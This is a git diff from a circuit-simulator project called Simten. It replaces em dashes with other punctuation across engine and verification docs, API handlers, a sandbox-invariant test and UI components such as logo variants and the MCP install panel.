 ```
 isSourceNode:       Uint8Array[nodeIdx]  → no inputs (Constant, Switch, Input)
 isStateOutputNode:  Uint8Array[nodeIdx]  → outputs depend on state (Register, DFlipFlop)
@@ -197,7 +197,7 @@ EVALUATORS[PRIMITIVE_TYPE_INDICES.Or] = evalOr;
 // ... one entry per primitive type
 ```
 
-Hot path lookup: `EVALUATORS[primitiveTypeIndex[nodeIndex]](ctx)` — single array index, no branching.
+Hot path lookup: `EVALUATORS[primitiveTypeIndex[nodeIndex]](ctx)`: single array index, no branching.
 
 ### Evaluation Context
 
@@ -219,7 +219,7 @@ interface EvalContext {
 ### Helper Functions
 
 ```typescript
-// Read input port value (O(1) — no string ops)
+// Read input port value (O(1), no string ops)
 function readInput(ctx: EvalContext, inputIndex: number): number {
   const sourcePortIdx = ctx.circuit.inputSourcePort[ctx.portStart + inputIndex];
   return sourcePortIdx >= 0 ? ctx.values.values[sourcePortIdx] : 0;
@@ -241,7 +241,7 @@ function writeOutput(ctx: EvalContext, outputIndex: number, value: number): void
 | sequential.ts | DFlipFlop, Register, Screen, RasterDisplay, Console | Read from `currentState[nodeIndex]` |
 | memory.ts | ROM, RAM, DualPortRAM | Sparse Map storage, combinational read path |
 
-Sequential evaluators only read state for their outputs — state updates happen in a separate phase.
+Sequential evaluators only read state for their outputs; state updates happen in a separate phase.
 
 
 ## Tick Cycle
@@ -269,7 +269,7 @@ while queue is not empty:
 Stabilizes when no more changes propagate. Throws after 10,000 iterations (unstable feedback loop).
 
 This phase evaluates combinational logic against the **current (pre-edge)** register state. Its
-result is not the snapshot returned to the API — that comes from Phase 5, after the clock edge.
+result is not the snapshot returned to the API; that comes from Phase 5, after the clock edge.
 
 ### Phase 2: Clock Update
 
@@ -277,7 +277,7 @@ result is not the snapshot returned to the API — that comes from Phase 5, afte
 updateClockStates(circuit, seqState);
 ```
 
-Sets all clocks to rising edge. Currently all clocks tick simultaneously (single clock domain). There is only ever the one implicit clock every stateful primitive subscribes to — [How it works §3](/docs/how-it-works#3-sequential-vs-combinational) covers where it comes from and why circuits never wire it.
+Sets all clocks to rising edge. Currently all clocks tick simultaneously (single clock domain). There is only ever the one implicit clock every stateful primitive subscribes to. [How it works §3](/docs/how-it-works#3-sequential-vs-combinational) covers where it comes from and why circuits never wire it.
 
 ### Phase 3: Sequential State Computation
 
@@ -313,10 +313,10 @@ propagate(circuit, queue, values, seqState, topLevelInputs);
 ```
 
 Propagates the committed state through combinational logic. Only seeds state-output nodes
-(not source nodes — they haven't changed).
+(not source nodes, which haven't changed).
 
 **This is the snapshot returned to the API.** Each `tick()` returns the settled values
-*after* the clock edge — equivalent to Verilog `@(posedge clk); #1`. This matches the
+*after* the clock edge, equivalent to Verilog `@(posedge clk); #1`. This matches the
 intuitive "tick → see new value" model: a counter at 0 reads 1 after one `tick()`.
 `getPortValues()` and `getOutput()` read from this same post-edge snapshot until the next
 `tick()` or `setNode()`.
@@ -340,7 +340,7 @@ Injected data overwrites builder-embedded data for overlapping addresses.
 
 ### Storage
 
-Memory uses `Map<number, number>` for sparse storage — only written addresses consume memory.
+Memory uses `Map<number, number>` for sparse storage: only written addresses consume memory.
 A 64K address space with 100 written cells uses 100 Map entries, not 65536 array slots.
 
 State is stored in `seqState.currentState[nodeIndex]` and deep-copied on commit to prevent
@@ -361,9 +361,9 @@ engine.runCombinational();
 
 // Sequential tick
 const result = engine.tick();
-// result.portValues — all port values after combinational propagation
-// result.sequentialState — committed state after clock edge
-// result.metrics — { phase1Evals, phase2Evals, totalEvals }
+// result.portValues: all port values after combinational propagation
+// result.sequentialState: committed state after clock edge
+// result.metrics: { phase1Evals, phase2Evals, totalEvals }
 
 // Input control
 engine.setNode(nodeId, value);
@@ -419,4 +419,4 @@ The event-driven approach means only nodes whose inputs actually changed get re-
 - **32-bit value range**: All values stored as Int32. Bus widths up to 32 bits are supported.
   Wider buses require splitting.
 - **No timing simulation**: All combinational logic evaluates in zero simulated time. There is
-  no gate delay model — this is a functional simulator, not a timing simulator.
+  no gate delay model: this is a functional simulator, not a timing simulator.

--- a/apps/web/content/docs/verifying-circuits.mdx
+++ b/apps/web/content/docs/verifying-circuits.mdx
@@ -1,31 +1,31 @@
 ---
 title: Verifying circuits
-description: How to prove a circuit is correct — the tier ladder, the npm-as-oracle pattern, and the verify_circuit tool.
+description: How to prove a circuit is correct: the tier ladder, the npm-as-oracle pattern, and the verify_circuit tool.
 ---
 
 A simulator tells you what a circuit *does*. Verification tells you whether what it does is *what it should*. Those are different questions, and the second one rests on something the first can't supply: an **independent reference** for what the right answer is.
 
-This is where most homegrown test suites go wrong. The same author who writes `Adder8`'s gates writes the test, and the test happens to encode the same blind spots as the implementation — they fail in lockstep, or worse, agree on a wrong answer. The further apart the reference and the implementation, the more the test actually buys you. Simten makes that distance explicit by **requiring you to declare it**.
+This is where most homegrown test suites go wrong. The same author who writes `Adder8`'s gates writes the test, and the test happens to encode the same blind spots as the implementation: they fail in lockstep, or worse, agree on a wrong answer. The further apart the reference and the implementation, the more the test actually buys you. Simten makes that distance explicit by **requiring you to declare it**.
 
 ## The gate
 
-`verify_circuit` refuses to report a passing result unless you've called `declareOracle({ tier, type, independence_basis })`. The structural test of "is this passing" is gated behind an authorial assertion of "this is what I'm comparing against, and here's why it isn't a restatement of the implementation." You can lie to the gate — nothing checks the prose. But the act of writing it forces you to look at the question, which is the part that matters.
+`verify_circuit` refuses to report a passing result unless you've called `declareOracle({ tier, type, independence_basis })`. The structural test of "is this passing" is gated behind an authorial assertion of "this is what I'm comparing against, and here's why it isn't a restatement of the implementation." You can lie to the gate, and nothing checks the prose. But the act of writing it forces you to look at the question, which is the part that matters.
 
 ## The tier ladder
 
 Independence isn't binary. Some references are genuinely external; others are restatements of the implementation in disguise. The ladder is the shorthand for that gradient, highest independence first:
 
-- **A — External ground truth.** Expected outputs come from a source *other than this circuit*: compiled programs with known results, captured real-world data, spec/RFC reference vectors, or an npm reference implementation. **What makes it Tier A is the externality of the expected values, not the execution path.** A SHA-256 circuit checked against `@noble/hashes`. A CRC-8 against the `crc` npm package. A RISC-V program whose output is known.
-- **B — Paradigm-diverse reference.** A behavioural model written in a different style than the implementation: a structural ripple-carry adder vs `(a + b) & 0xff`, a pipelined CPU vs a single-cycle reference. The reference and the implementation can both be wrong, but they're unlikely to be wrong the *same* way. This is classic golden-model differential testing.
-- **C — Domain invariants.** Properties the spec implies regardless of implementation: commutativity (`a + b == b + a`), identity (`a XOR 0 == a`), monotonicity, bit-width bounds. Doesn't pin behaviour to a specific value but constrains it usefully.
-- **D — Property tests against your own understanding.** "When the input is X, the output should be Y, because that's what I want." Low independence — you're testing the implementation against the same mental model that produced it.
-- **E — Round-trip / smoke.** No independent oracle at all. "Did it crash?" "Does the output have the right shape?" Useful as a sanity check, not as evidence of correctness.
+- **A, external ground truth.** Expected outputs come from a source *other than this circuit*: compiled programs with known results, captured real-world data, spec/RFC reference vectors, or an npm reference implementation. **What makes it Tier A is the externality of the expected values, not the execution path.** A SHA-256 circuit checked against `@noble/hashes`. A CRC-8 against the `crc` npm package. A RISC-V program whose output is known.
+- **B, paradigm-diverse reference.** A behavioural model written in a different style than the implementation: a structural ripple-carry adder vs `(a + b) & 0xff`, a pipelined CPU vs a single-cycle reference. The reference and the implementation can both be wrong, but they're unlikely to be wrong the *same* way. This is classic golden-model differential testing.
+- **C, domain invariants.** Properties the spec implies regardless of implementation: commutativity (`a + b == b + a`), identity (`a XOR 0 == a`), monotonicity, bit-width bounds. Doesn't pin behaviour to a specific value but constrains it usefully.
+- **D, property tests against your own understanding.** "When the input is X, the output should be Y, because that's what I want." Low independence: you're testing the implementation against the same mental model that produced it.
+- **E, round-trip / smoke.** No independent oracle at all. "Did it crash?" "Does the output have the right shape?" Useful as a sanity check, not as evidence of correctness.
 
 The rule the tool encodes: **"done" means verified at the highest tier the problem makes feasible.** Tier C and below are warnings, not certifications.
 
 ## The flagship pattern: an npm package as the oracle
 
-The whole reason `verify` runs on the host via `tsx` rather than in a sandbox is this one capability: your testbench can `import` any npm package directly, and use it as the trusted reference. This collapses the most expensive part of a Tier-A test — finding or building an external ground truth — into a single import line.
+The whole reason `verify` runs on the host via `tsx` rather than in a sandbox is this one capability: your testbench can `import` any npm package directly, and use it as the trusted reference. This collapses the most expensive part of a Tier-A test (finding or building an external ground truth) into a single import line.
 
 The canonical example, lifted verbatim from `packages/core/src/verify/__fixtures__/flagship-npm-oracle.verify.ts`:
 
@@ -57,7 +57,7 @@ verify.run();
 
 The flow:
 
-1. Import the npm package as if it were any other module — it resolves from `node_modules` exactly like it would in a regular Node program.
+1. Import the npm package as if it were any other module: it resolves from `node_modules` exactly like it would in a regular Node program.
 2. Compute the expected value *outside* the circuit. `sha256(...)` runs once, in JavaScript, against an authoritative crypto library.
 3. Declare the oracle. `tier: 'A'` because the expected bytes come from an external implementation; `independence_basis` says *why* in one line.
 4. Run a check that compares the circuit's output to the npm-computed expected value across every relevant input.
@@ -93,12 +93,12 @@ verify.exhaustive('truth table', [2, 2], (a, b) => {
 verify.run();   // the gate
 ```
 
-The DUT must be `export`-ed from its circuit file so the testbench can import it. The injected-scope contract that the browser sandbox uses is not in play here — this file runs as real Node ESM under `tsx`.
+The DUT must be `export`-ed from its circuit file so the testbench can import it. The injected-scope contract that the browser sandbox uses is not in play here, because this file runs as real Node ESM under `tsx`.
 
 ### `verify.exhaustive` vs `verify.check`
 
-- **`verify.exhaustive(name, spaces, predicate)`** — sweeps every combination in the given input spaces. `[256]` means "0..255." `[2, 2]` means "all 4 (a, b) pairs." Use when the input space is small enough to enumerate (the harness caps at 2²⁰ to prevent runaway costs).
-- **`verify.check(name, fc.property(...))`** — samples with `fast-check`. Use for larger input spaces. The shrinker gives you a small repro on failure.
+- **`verify.exhaustive(name, spaces, predicate)`** sweeps every combination in the given input spaces. `[256]` means "0..255." `[2, 2]` means "all 4 (a, b) pairs." Use when the input space is small enough to enumerate (the harness caps at 2²⁰ to prevent runaway costs).
+- **`verify.check(name, fc.property(...))`** samples with `fast-check`. Use for larger input spaces. The shrinker gives you a small repro on failure.
 
 ### `declareOracle` lives at module top level
 
@@ -108,9 +108,9 @@ One declaration per testbench. The tool reads it at the gate; the harness record
 
 Three paths, all run the same testbench file unchanged:
 
-- **From an agent**, via `verify_circuit`. The MCP tool takes the testbench path and an oracle (which the tool re-injects via `SIMTEN_VERIFY_ORACLE` so the gate is the *tool's* oracle, not whichever the file declares — letting an agent run a circuit at a tougher tier than the author originally intended). Returns the structured JSON result inline.
+- **From an agent**, via `verify_circuit`. The MCP tool takes the testbench path and an oracle (which the tool re-injects via `SIMTEN_VERIFY_ORACLE` so the gate is the *tool's* oracle, not whichever the file declares, letting an agent run a circuit at a tougher tier than the author originally intended). Returns the structured JSON result inline.
 - **From the CLI**, via `tsx <testbench>.verify.ts`. The harness prints the result as a delimited `--- BEGIN JSON --- … --- END JSON ---` block and sets `process.exitCode`.
-- **In CI**, as a vitest test. The same file runs under `vitest run` — the harness detects vitest mode and throws on failure instead of printing, so the test goes red.
+- **In CI**, as a vitest test. The same file runs under `vitest run`, and the harness detects vitest mode and throws on failure instead of printing, so the test goes red.
 
 The "same file in three places" property is deliberate. A verify file doubles as a CI test the moment you wrap it: no separate test infrastructure, no parallel implementations, no drift.
 
@@ -135,7 +135,7 @@ A passing result looks like this:
 }
 ```
 
-The shape worth pointing at: **the oracle is the lede, not the pass/fail.** "Tier A, exhaustive 4, passed" tells you *how strong the claim is*, not just whether it landed. "Tier D, sampled 100, passed" is also a passing result — but it earns far less trust, and the JSON makes that visible. Lead with the tier when you report a verify result; the gate exists so this distinction can't be erased.
+The shape worth pointing at: **the oracle is the lede, not the pass/fail.** "Tier A, exhaustive 4, passed" tells you *how strong the claim is*, not just whether it landed. "Tier D, sampled 100, passed" is also a passing result, but it earns far less trust, and the JSON makes that visible. Lead with the tier when you report a verify result; the gate exists so this distinction can't be erased.
 
 A failure includes the counter-example (the input that broke the check), shrunk where applicable:
 
@@ -148,4 +148,4 @@ A failure includes the counter-example (the input that broke the check), shrunk 
 }
 ```
 
-Reading the report and reading the *oracle* are the same job. A green result against a Tier-D oracle is a weaker statement than a red result against a Tier-A oracle — the latter at least found a real bug.
+Reading the report and reading the *oracle* are the same job. A green result against a Tier-D oracle is a weaker statement than a red result against a Tier-A oracle, because the latter at least found a real bug.

--- a/apps/web/content/docs/verifying-circuits.mdx
+++ b/apps/web/content/docs/verifying-circuits.mdx
@@ -1,6 +1,6 @@
 ---
 title: Verifying circuits
-description: How to prove a circuit is correct: the tier ladder, the npm-as-oracle pattern, and the verify_circuit tool.
+description: How to prove a circuit is correct, with the tier ladder, the npm-as-oracle pattern, and the verify_circuit tool.
 ---
 
 A simulator tells you what a circuit *does*. Verification tells you whether what it does is *what it should*. Those are different questions, and the second one rests on something the first can't supply: an **independent reference** for what the right answer is.

--- a/apps/web/src/__tests__/sandbox-invariants.test.ts
+++ b/apps/web/src/__tests__/sandbox-invariants.test.ts
@@ -5,7 +5,7 @@
  * All arbitrary JS execution must go through the sandbox (iframe + Web Worker).
  *
  * new Function() is the underlying primitive used by executeCircuitCode and
- * executeJsCode — banning it here covers both and any future variants.
+ * executeJsCode; banning it here covers both and any future variants.
  */
 
 import { readdirSync, readFileSync, statSync } from 'fs';
@@ -14,7 +14,7 @@ import { join } from 'path';
 const APP_SRC = join(__dirname, '..');
 const EMBED_SRC = join(__dirname, '../../../../packages/embed/src');
 // packages/ui is where useSandbox itself lives, so it is the package most
-// likely to grow a violation — and it was not being scanned.
+// likely to grow a violation, and it was not being scanned.
 const UI_SRC = join(__dirname, '../../../../packages/ui/src');
 
 function collectSourceFiles(dir: string): string[] {
@@ -40,7 +40,7 @@ function collectSourceFiles(dir: string): string[] {
   return files;
 }
 
-// Patterns that execute arbitrary JS — all must go through the sandbox
+// Patterns that execute arbitrary JS; all must go through the sandbox
 const BANNED: Array<{ pattern: RegExp; reason: string }> = [
   {
     pattern: /new Function\(/,
@@ -48,7 +48,7 @@ const BANNED: Array<{ pattern: RegExp; reason: string }> = [
   },
   {
     pattern: /import[^'"]*\b(executeCircuitCode|executeJsCode)\b/,
-    reason: 'executeCircuitCode/executeJsCode call new Function() — use sandbox.compile() instead',
+    reason: 'executeCircuitCode/executeJsCode call new Function(); use sandbox.compile() instead',
   },
 ];
 

--- a/apps/web/src/api/compile.ts
+++ b/apps/web/src/api/compile.ts
@@ -1,5 +1,5 @@
 /**
- * Compile API Handler — proxies to the compiler container.
+ * Compile API Handler: proxies to the compiler container.
  *
  * Production: uses Cloudflare service binding (private, no public access).
  * Local dev:  falls back to wrangler dev on localhost:55001.
@@ -26,7 +26,7 @@ export async function handleCompile(
     const { success } = await rl.limit({ key: ip });
     if (!success) {
       return Response.json(
-        { success: false, error: 'Rate limit exceeded — try again in a minute' },
+        { success: false, error: 'Rate limit exceeded, try again in a minute' },
         { status: 429 },
       );
     }

--- a/apps/web/src/api/synth.ts
+++ b/apps/web/src/api/synth.ts
@@ -1,5 +1,5 @@
 /**
- * Verilog Import API Handler — Verilog source → clean, editable simten TypeScript.
+ * Verilog Import API Handler: Verilog source → clean, editable simten TypeScript.
  *
  * Runs yosys on the synth container (the `import` target: generic RTL netlist,
  * no techmapping) then lifts that netlist into simten source with
@@ -66,7 +66,7 @@ function checkPath(path: unknown, what: string): string | undefined {
     return `${what}: ${path} is more than ${MAX_PATH_DEPTH} levels deep`;
   for (const segment of segments) {
     if (!PATH_SEGMENT.test(segment)) {
-      return `${what}: "${segment}" is not allowed in ${path} — letters, digits, '_', '.' and '-', with no leading dot and no '..'`;
+      return `${what}: "${segment}" is not allowed in ${path}: letters, digits, '_', '.' and '-', with no leading dot and no '..'`;
     }
   }
   return undefined;
@@ -135,7 +135,7 @@ export async function handleVerilogImport(
     return Response.json({ success: false, error: invalid }, { status: 400 });
   }
 
-  // Rate limit — yosys is CPU-heavy and the container has few instances, so keep
+  // Rate limit: yosys is CPU-heavy and the container has few instances, so keep
   // this modest per IP (5/min). Mirrors the compile/verify handlers.
   const rl = (
     env as { SYNTH_RL?: { limit: (k: { key: string }) => Promise<{ success: boolean }> } }
@@ -145,7 +145,7 @@ export async function handleVerilogImport(
     const { success } = await rl.limit({ key: ip });
     if (!success) {
       return Response.json(
-        { success: false, error: 'Rate limit exceeded — try again in a minute' },
+        { success: false, error: 'Rate limit exceeded, try again in a minute' },
         { status: 429 },
       );
     }
@@ -197,7 +197,7 @@ export async function handleVerilogImport(
   }
 
   // Lift the generic RTL netlist into clean, editable simten source. The
-  // importer throws on cell types outside its scope (e.g. $adff/$sdff/$dffe —
+  // importer throws on cell types outside its scope (e.g. $adff/$sdff/$dffe,
   // see issue #237) rather than mis-translate; surface that as a clean 422 with
   // an `unsupported` flag the UI can special-case.
   try {
@@ -208,7 +208,7 @@ export async function handleVerilogImport(
     // Non-fatal notes: the importer's warnings (e.g. undriven nets) plus yosys's
     // own warnings from the synth log (e.g. implicit/undeclared wires). Drop the
     // line number so repeats of the same problem collapse, but keep the
-    // filename — across a 27-file project the old strip took the file with it
+    // filename; across a 27-file project the old strip took the file with it
     // and merged unrelated warnings from different modules into one entry.
     const yosysWarnings = (synthResult.log ?? '')
       .split('\n')

--- a/apps/web/src/api/verify.ts
+++ b/apps/web/src/api/verify.ts
@@ -1,5 +1,5 @@
 /**
- * Verify API Handler — proxies to the verifier container.
+ * Verify API Handler: proxies to the verifier container.
  *
  * Production: uses Cloudflare service binding.
  * Local dev:  falls back to wrangler dev on localhost:55002.
@@ -51,7 +51,7 @@ export async function handleVerify(
     const { success } = await rl.limit({ key: ip });
     if (!success) {
       return Response.json(
-        { success: false, compileError: 'Rate limit exceeded — try again in a minute' },
+        { success: false, compileError: 'Rate limit exceeded, try again in a minute' },
         { status: 429 },
       );
     }

--- a/apps/web/src/components/Container.tsx
+++ b/apps/web/src/components/Container.tsx
@@ -4,13 +4,13 @@
  * The pattern: full-width sections own their own background and vertical
  * rhythm; <Container> goes inside each section to constrain the *content*
  * to a comfortable read width. Same component used everywhere so content
- * edges line up vertically across sections — the visual "single
+ * edges line up vertically across sections; the visual "single
  * container" effect you see on cursor.com / vercel.com / linear.com is
  * actually consistent use of one component, not one literal wrapper.
  *
  * Variants:
- *   - `default` (max-w-7xl) — most landing-page content
- *   - `bleed` — escape hatch for sections that handle their own layout
+ *   - `default` (max-w-7xl): most landing-page content
+ *   - `bleed`: escape hatch for sections that handle their own layout
  *               (e.g. full-bleed media, custom multi-column grids)
  */
 

--- a/apps/web/src/components/EditorShell.tsx
+++ b/apps/web/src/components/EditorShell.tsx
@@ -15,7 +15,7 @@ export default function EditorShell({ initialSource, standalone }: EditorShellPr
     <EditorWorkspace theme={theme} initialSource={initialSource} standalone={standalone} />
   );
   // The standalone local MCP viewer is a desktop dev tool and has no router, so
-  // skip the mobile gate — its MobileEditorNotice renders router <Link>s, which
+  // skip the mobile gate; its MobileEditorNotice renders router <Link>s, which
   // DesktopOnly mounts (CSS-hidden) even on desktop and would crash here.
   if (standalone) return editor;
   return <DesktopOnly fallback={<MobileEditorNotice />}>{editor}</DesktopOnly>;

--- a/apps/web/src/components/HighlightedCode.tsx
+++ b/apps/web/src/components/HighlightedCode.tsx
@@ -1,5 +1,5 @@
 /**
- * HighlightedCode — shared TypeScript syntax-highlighted code block.
+ * HighlightedCode: shared TypeScript syntax-highlighted code block.
  *
  * Uses sugar-high, a ~1KB JS/TS tokenizer. Ships two palettes
  * (GitHub-light and GitHub-dark) via Tailwind arbitrary CSS properties
@@ -10,10 +10,10 @@ import type { ReactNode } from 'react';
 import { highlight } from 'sugar-high';
 
 // sugar-high is driven by CSS custom properties (--sh-*). Both palettes
-// below are exposed as arbitrary-property Tailwind classes — the `dark:`
+// below are exposed as arbitrary-property Tailwind classes; the `dark:`
 // variants kick in under class-based dark mode.
 const SH_THEME_CLASSES = [
-  // Light mode — GitHub-light
+  // Light mode: GitHub-light
   '[--sh-keyword:#d73a49]',
   '[--sh-identifier:#24292e]',
   '[--sh-string:#032f62]',
@@ -23,7 +23,7 @@ const SH_THEME_CLASSES = [
   '[--sh-jsxliterals:#005cc5]',
   '[--sh-sign:#586069]',
   '[--sh-comment:#6a737d]',
-  // Dark mode — GitHub-dark
+  // Dark mode: GitHub-dark
   'dark:[--sh-keyword:#ff7b72]',
   'dark:[--sh-identifier:#c9d1d9]',
   'dark:[--sh-string:#a5d6ff]',

--- a/apps/web/src/components/Logo.tsx
+++ b/apps/web/src/components/Logo.tsx
@@ -1,11 +1,11 @@
 /**
- * Simten logo — variants.
+ * Simten logo variants.
  *
  * To swap the active logo, change which one is exported as `Logo` at the bottom.
  * All variants:
  *   - 32×32 viewBox, scalable via the `size` prop
  *   - Use `currentColor` so they inherit foreground via CSS / parent text color
- *   - Single-mark, no text — meant to be paired with the wordmark separately
+ *   - Single-mark, no text, meant to be paired with the wordmark separately
  *   - Designed to read at 16×16 (favicon scale)
  */
 
@@ -15,7 +15,7 @@ interface LogoProps {
 }
 
 // ──────────────────────────────────────────────────────────
-// A) NAND gate — universal symbol of digital logic.
+// A) NAND gate: universal symbol of digital logic.
 //    D-shape body with a negation bubble on the output.
 //    Reads as "we do digital." Filled body gives it weight.
 // ──────────────────────────────────────────────────────────
@@ -60,7 +60,7 @@ export function LogoNand({ size = 28, className }: LogoProps) {
 }
 
 // ──────────────────────────────────────────────────────────
-// B) Orthogonal trace — two nodes connected by a right-angle wire.
+// B) Orthogonal trace: two nodes connected by a right-angle wire.
 //    Echoes the visual language of the actual circuits (orthogonal
 //    edge routing). Reads as "graph / circuit topology."
 // ──────────────────────────────────────────────────────────
@@ -85,7 +85,7 @@ export function LogoTrace({ size = 28, className }: LogoProps) {
 }
 
 // ──────────────────────────────────────────────────────────
-// C) Square wave — a clock signal. Universal hardware/timing icon.
+// C) Square wave: a clock signal. Universal hardware/timing icon.
 //    Stark, recognizable, no ambiguity about the domain.
 // ──────────────────────────────────────────────────────────
 export function LogoSquareWave({ size = 28, className }: LogoProps) {
@@ -104,7 +104,7 @@ export function LogoSquareWave({ size = 28, className }: LogoProps) {
 }
 
 // ──────────────────────────────────────────────────────────
-// D) Hex die — hexagonal chip die outline with a centred port.
+// D) Hex die: hexagonal chip die outline with a centred port.
 //    Hexagons are tech-canonical (Cloudflare, Linear, Hex).
 //    The inner dot suggests a CPU core / central node.
 // ──────────────────────────────────────────────────────────
@@ -124,13 +124,13 @@ export function LogoHex({ size = 28, className }: LogoProps) {
 }
 
 // ──────────────────────────────────────────────────────────
-// E) SIM wordmark — one continuous square-wave trace that forms S, I, M.
+// E) SIM wordmark: one continuous square-wave trace that forms S, I, M.
 //    Single SVG path, never lifts, only horizontal/vertical strokes,
-//    only 90° corners. The letters emerge from the path's shape — S is
+//    only 90° corners. The letters emerge from the path's shape; S is
 //    the rectangular zigzag, I is a tall narrow pulse, M is two pulses
 //    sharing a valley. All drawn as one wave moving left to right.
 //
-//    Wider than the icon variants (~2.5:1). Use a larger `size` —
+//    Wider than the icon variants (~2.5:1). Use a larger `size`,
 //    for header use try `size={32}` or higher; the SVG will scale.
 // ──────────────────────────────────────────────────────────
 export function LogoSimWordmark({ size = 32, className }: LogoProps) {
@@ -139,7 +139,7 @@ export function LogoSimWordmark({ size = 32, className }: LogoProps) {
     <svg width={size * 2.5} height={size} viewBox="0 0 80 32" fill="none" className={className}>
       {/* ONE continuous square-wave path traversing left-to-right.
           Reads as S then I then M as the wave rises and falls.
-          No serifs, no separate strokes, no curves — every joint is 90°. */}
+          No serifs, no separate strokes, no curves; every joint is 90°. */}
       <path
         d="
           M 0 28
@@ -159,7 +159,7 @@ export function LogoSimWordmark({ size = 32, className }: LogoProps) {
 }
 
 // ──────────────────────────────────────────────────────────
-// F) sim10 wordmark — hand-drawn waveform from Excalidraw, themed.
+// F) sim10 wordmark: hand-drawn waveform from Excalidraw, themed.
 //    The brand "simten" rendered as "sim10" so it reads as both a
 //    decimal ten and a binary nod. Sketchy/hand-drawn aesthetic with
 //    every stroke doubled (Excalidraw's signature look).
@@ -172,7 +172,7 @@ export function LogoSim10({ size = 32, className }: LogoProps) {
   // Cropped viewBox: tightens around the actual wave content (which lives at
   // x=10..33.75, y=10..25.69 in the original Excalidraw export). Strips the
   // surrounding padding so the logo doesn't have giant whitespace when placed
-  // next to a wordmark. Background rect from the export is dropped — stroke
+  // next to a wordmark. Background rect from the export is dropped; stroke
   // uses currentColor so the mark follows the host's text color (theme-aware).
   return (
     <svg width={size * 1.4} height={size} viewBox="8 8 28 20" fill="none" className={className}>
@@ -190,14 +190,14 @@ export function LogoSim10({ size = 32, className }: LogoProps) {
 }
 
 // ──────────────────────────────────────────────────────────
-// G) Sim10 favicon mark — square, single-stroke variant of the full wordmark.
+// G) Sim10 favicon mark: square, single-stroke variant of the full wordmark.
 //    Same hand-drawn "sim10" path as LogoSim10, but:
 //      - Drop Excalidraw's doubled strokes (every line drawn twice in the
-//        wordmark; at favicon sizes the duplicates blur into mush — single
+//        wordmark; at favicon sizes the duplicates blur into mush, so single
 //        renders cleaner without losing the wobble)
 //      - Bump strokeWidth from 1 to 2.5 (so it survives 16x16)
 //      - Center in a 32x32 square viewBox
-//    Used in apps/web/public/favicon.svg — the static file the browser
+//    Used in apps/web/public/favicon.svg, the static file the browser
 //    actually fetches. Keep the React variant and the static SVG in sync.
 // ──────────────────────────────────────────────────────────
 export function LogoSim10Mark({ size = 32, className }: LogoProps) {
@@ -217,7 +217,7 @@ export function LogoSim10Mark({ size = 32, className }: LogoProps) {
 }
 
 // ──────────────────────────────────────────────────────────
-// Original — kept for reference / fallback. Friendly mascot face.
+// Original: kept for reference / fallback. Friendly mascot face.
 // ──────────────────────────────────────────────────────────
 export function LogoOriginal({ size = 28, className }: LogoProps) {
   return (
@@ -249,12 +249,12 @@ export function LogoOriginal({ size = 28, className }: LogoProps) {
 }
 
 // ──────────────────────────────────────────────────────────
-// Active export — swap which variant is `Logo` to preview different marks.
+// Active export: swap which variant is `Logo` to preview different marks.
 // Options:
 //   LogoNand · LogoTrace · LogoSquareWave · LogoHex
-//   LogoSimWordmark — 2.5:1 ortho-stroke wordmark (S/I/M)
-//   LogoSim10       — hand-drawn waveform "sim10" (~1.37:1, header use)
-//   LogoSim10Mark   — square favicon variant of LogoSim10 (mirrored in public/favicon.svg)
-//   LogoOriginal    — friendly triangle mascot
+//   LogoSimWordmark - 2.5:1 ortho-stroke wordmark (S/I/M)
+//   LogoSim10       - hand-drawn waveform "sim10" (~1.37:1, header use)
+//   LogoSim10Mark   - square favicon variant of LogoSim10 (mirrored in public/favicon.svg)
+//   LogoOriginal    - friendly triangle mascot
 // ──────────────────────────────────────────────────────────
 export const Logo = LogoSim10;

--- a/apps/web/src/components/McpInstall.tsx
+++ b/apps/web/src/components/McpInstall.tsx
@@ -2,14 +2,14 @@ import { Check, Copy } from 'lucide-react';
 import { useEffect, useState } from 'react';
 
 // Single source of truth for how each agent CLI registers the Simten MCP
-// server. Add a new client by appending one entry — the tab UI and both the
+// server. Add a new client by appending one entry; the tab UI and both the
 // docs page and any other embed pick it up automatically.
 //
 // Verified against each tool's official MCP docs (July 2026):
-//   Claude Code  — `claude mcp add <name> <cmd>`
-//   Codex CLI    — `codex mcp add <name> -- <cmd>`  (note the `--` separator)
-//   Gemini CLI   — `gemini mcp add <name> <cmd>`
-//   Cursor & co. — no register-via-CLI; a `mcpServers` JSON block, which is
+//   Claude Code  - `claude mcp add <name> <cmd>`
+//   Codex CLI    - `codex mcp add <name> -- <cmd>`  (note the `--` separator)
+//   Gemini CLI   - `gemini mcp add <name> <cmd>`
+//   Cursor & co. - no register-via-CLI; a `mcpServers` JSON block, which is
 //                  the same shape Windsurf, VS Code, Claude Desktop and Zed use.
 type Client = {
   id: string;
@@ -53,7 +53,7 @@ const CLIENTS: Client[] = [
   }
 }`,
     },
-    note: 'Same block works for Windsurf, VS Code, Claude Desktop, and Zed — drop it in that client’s MCP config.',
+    note: 'Same block works for Windsurf, VS Code, Claude Desktop, and Zed; drop it in that client’s MCP config.',
   },
 ];
 
@@ -76,7 +76,7 @@ export function McpInstall() {
     try {
       localStorage.setItem(STORAGE_KEY, id);
     } catch {
-      // private mode / storage disabled — selection just won't persist
+      // private mode / storage disabled; selection just won't persist
     }
   };
 

--- a/apps/web/src/components/MobileEditorNotice.tsx
+++ b/apps/web/src/components/MobileEditorNotice.tsx
@@ -21,7 +21,7 @@ export function MobileEditorNotice() {
           </div>
           <h1 className="mb-2 text-xl font-semibold tracking-tight">The editor needs a desktop</h1>
           <p className="mb-6 text-sm text-muted-foreground leading-relaxed">
-            Building circuits relies on hover, drag, and a wide canvas — it isn&apos;t comfortable
+            Building circuits relies on hover, drag, and a wide canvas, so it isn&apos;t comfortable
             on a small touchscreen yet. Please open this page on a laptop or desktop browser.
           </p>
           <div className="flex flex-col gap-2">

--- a/apps/web/src/components/SiteFooter.tsx
+++ b/apps/web/src/components/SiteFooter.tsx
@@ -7,8 +7,8 @@ import { Logo } from '@/components/Logo';
  * Multi-column site footer used on every content page.
  *
  * Layout is the standard marketing footer: brand mark on the left, then four
- * link columns. Responsive collapse — 4 columns on desktop (lg), 2 on tablet
- * (sm), 1 stacked on mobile — with the brand stacking above the columns below
+ * link columns. Responsive collapse: 4 columns on desktop (lg), 2 on tablet
+ * (sm), 1 stacked on mobile, with the brand stacking above the columns below
  * lg. A divider + © / legal row sits at the bottom. Tool routes (/circuit,
  * /cpu/rv32i) suppress this just like they suppress the default SiteHeader.
  */
@@ -56,7 +56,7 @@ export function SiteFooter() {
           <div className="lg:w-60 lg:shrink-0">
             <Link
               to="/"
-              aria-label="Simten — home"
+              aria-label="Simten home"
